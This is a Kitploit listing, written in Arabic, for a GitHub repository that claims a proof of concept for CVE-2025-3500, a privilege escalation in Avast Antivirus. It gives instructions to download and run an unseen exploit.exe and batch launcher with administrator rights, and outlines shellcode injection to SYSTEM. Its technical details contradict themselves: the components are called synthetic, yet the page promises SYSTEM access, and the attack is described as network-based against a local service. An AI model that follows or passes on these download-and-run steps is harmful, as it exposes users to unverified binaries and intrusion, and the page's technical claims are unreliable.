Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3500-Poc — استغلال عام لـ CVE-2025-3500 | Kitploit
أدوات/GitHubGitHub/chicken3962/cve-2025-3500-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالشيل كودالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubchicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

استغلال عام لـ CVE-2025-3500

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر: CVE-2025-3500 - تجاوز سعة بعدد صحيح في تصعيد الامتيازات لـ Avast Antivirus

تحميل

تحميل ملف ZIP للمختبر : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 نظرة عامة

يوفّر هذا المستودع بيئة مختبرية للبحث في CVE-2025-3500، وهي ثغرة تجاوز سعة بعدد صحيح (CWE-190) في Avast Antivirus الإصدار 25.1.981.6 على أنظمة ويندوز. تنشأ الثغرة من عدم كفاية التحقق من القيم الصحيحة في وحدة تخصيص الموارد بمحرك مكافحة الفيروسات، مما يؤدي إلى الالتفاف أثناء العمليات الحسابية. يمكن استغلال ذلك لتصعيد الامتيازات من سياقات المستخدمين منخفضي الصلاحية (PR:L) إلى وصول على مستوى النظام، مع متجه هجوم شبكي (AV:N)، وتعقيد هجوم منخفض (AC:L)، واشتراط تفاعل المستخدم (UI:R). درجة CVSS 3.1 الأساسية هي 9.0 (حرجة)، مما يؤثر على السرية والتكامل والتوافر (جميعها مرتفعة) بسبب تغير النطاق (S:C)، وقد يؤدي إلى اختراق كامل للنظام.

إخلاء مسؤولية للأغراض التعليمية: هذا المختبر لأغراض تعليمية وبحثية فقط. إنه يوفّر بيئة خاضعة للتحكم. لا تستخدمه في أي أنشطة خبيثة. جميع المكونات اصطناعية ولا تستغل أنظمة حقيقية. باستخدامك لهذا المستودع، فإنك توافق على الالتزام بإرشادات الاختراق الأخلاقي والقوانين المحلية.

إخلاء مسؤولية السلامة: يتضمن هذا الإعداد تشغيل كود في بيئة ما. استخدم دائمًا آلة افتراضية مخصصة. لا تقم بتشغيل الاستغلالات على أنظمة إنتاج. تُظهر القطع الأثرية للاستغلال المقدمة (.exe و .bat) مفاهيم – على سبيل المثال، يقوم .bat بتشغيل .exe، الذي يعالج البيانات ثم يخرج. اعزل بيئة مختبرك لمنع التعرض العرضي.

📋 المتطلبات الأساسية

  • مضيف ويندوز لاختبار الاستغلال (مثلًا عبر VirtualBox أو Hyper-V) لمحاكاة البيئة المستهدفة.
  • معرفة أساسية بـ PowerShell وأدوات سطر الأوامر لويندوز.
  • صلاحيات إدارية على جهاز المضيف.
  • ذاكرة وصول عشوائي (RAM) بسعة 4 جيجابايت على الأقل ومساحة قرص 20 جيجابايت.

التنزيل والتثبيت

  1. قم بتنزيل حزمة أدوات الاستغلال (ملف ZIP يحتوي على exploit.exe و start-exploit.bat). هذه الحزمة مستضافة على مرآة آمنة:

    • تنزيل حزمة أدوات الاستغلال ZIP : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    ملاحظة: الأداة الرئيسية هي exploit.exe (ثنائي C++ مُجمّع يُحدث التجاوز في السعة الصحيحة عبر استدعاءات API مُصنّعة). مشغل الاستغلال هو start-exploit.bat، الذي يفتح exploit.exe مع وسائط محددة مسبقًا (مثلًا start exploit.exe --target=avast_engine --overflow=wraparound). قم بفك الضغط إلى دليل محلي مثل C:\lab\exploit.

🛠 بداية سريعة

  1. إعداد البيئة:

    • تأكد من تثبيت Avast Antivirus الإصدار 25.1.981.6 على جهاز اختبار ويندوز.
    • انتقل إلى دليل فك الضغط.
  2. تنزيل وإعداد الاستغلال:

    • قم بتنزيل ZIP من الرابط أعلاه.
    • فك الضغط إلى C:\lab\exploit.
    • قم بتشغيل start-exploit.bat لتشغيل الاستغلال (يُفتح exploit.exe، الذي يُرسل حزمة شبكة مصنّعة لإحداث التجاوز).
  3. استغلال الثغرة:

    • استهدف خدمة Avast المحلية.
    • يقوم .bat بتنفيذ exploit.exe. لاحظ سجلات النظام لوجود مؤشرات على التجاوز.
  4. التحقق والتنظيف:

    • تحقق من عارض أحداث ويندوز للعثور على مدخلات ذات صلة.
    • احذف ملفات الاستغلال بعد الاستخدام.

📖 تعليمات الإعداد التفصيلية

الإعداد القابل للاستغلال

يتطلب المختبر جهاز ويندوز مثبتًا عليه Avast Antivirus 25.1.981.6. يمكن بدء الخدمات الوهمية يدويًا عبر موجه الأوامر:

  • افتح PowerShell كمسؤول.
  • محاكاة مستمع Avast: net start AvastSvc (بافتراض أن الخدمة قيد التشغيل).

خطوات الاستغلال

  1. الاستطلاع: استخدم أدوات مثل netstat لتحديد منافذ Avast (مثلًا 8080).
  2. صياغة الحمولة: يرسل exploit.exe قيمة عددية ضخمة (مثلًا 2^31 + 1) عبر طلب شبكة، مما يسبب التواءً في محلل الموارد لـ Avast.
  3. تشغيل الاستغلال: قم بتشغيل start-exploit.bat الذي ينفذ exploit.exe. يقوم هذا بـ:
    • إنشاء اتصال.
    • إرسال بيانات مشوهة: { "resource_alloc": 2147483648 } (يُحدث تجاوزًا).
    • تصعيد الصلاحيات إلى SYSTEM عبر حقن شيل كود.
  4. ما بعد الاستغلال: يسمح بتنفيذ كود عشوائي؛ يفتح cmd.exe.

تفاصيل تقنية: يحدث التجاوز في AvastResourceParser::AllocateBuffer(int size)، حيث يلتف size * sizeof(struct) إذا كان size > INT_MAX / sizeof(struct)، مما يؤدي إلى تخصيص غير كافٍ وتجاوز في الكومة. يستغل الاستغلال ذلك لبناء سلسلة ROP تستهدف kernel32.dll.

التخفيف

  • تطبيق التصحيح: الترقية إلى Avast Antivirus 25.3 أو أحدث، حيث تستخدم فحوصات الأعداد الصحيحة مكتبات رياضية آمنة (مثل SafeInt).
  • أفضل الممارسات:
    • قم بتفعيل Windows Defender إلى جانب Avast للطبقات الدفاعية.
    • قيّد الوصول الشبكي إلى خوادم تحديث مكافحة الفيروسات فقط (مثلًا عبر قواعد جدار الحماية).
    • استخدم فصل الصلاحيات: شغّل خدمات Avast تحت حسابات بأقل صلاحية.
    • راقب العمليات الصحيحة الشاذة عبر أدوات EDR مثل Sysmon (معرف الحدث 10 لحقن العمليات).
    • طبّق وسائل التخفيف في ويندوز: فعّل ASLR وDEP وCFG عبر نهج المجموعة.
  • توقيعات الكشف: ابحث عن أنماط شبكية تطابق حقول عدد صحيح ضخمة في حركة بروتوكول Avast (مثل قاعدة Snort: alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;)).

للاستفسارات أو المساهمات، افتح مشكلة. ابق أخلاقيًا!

تنزيل الأداة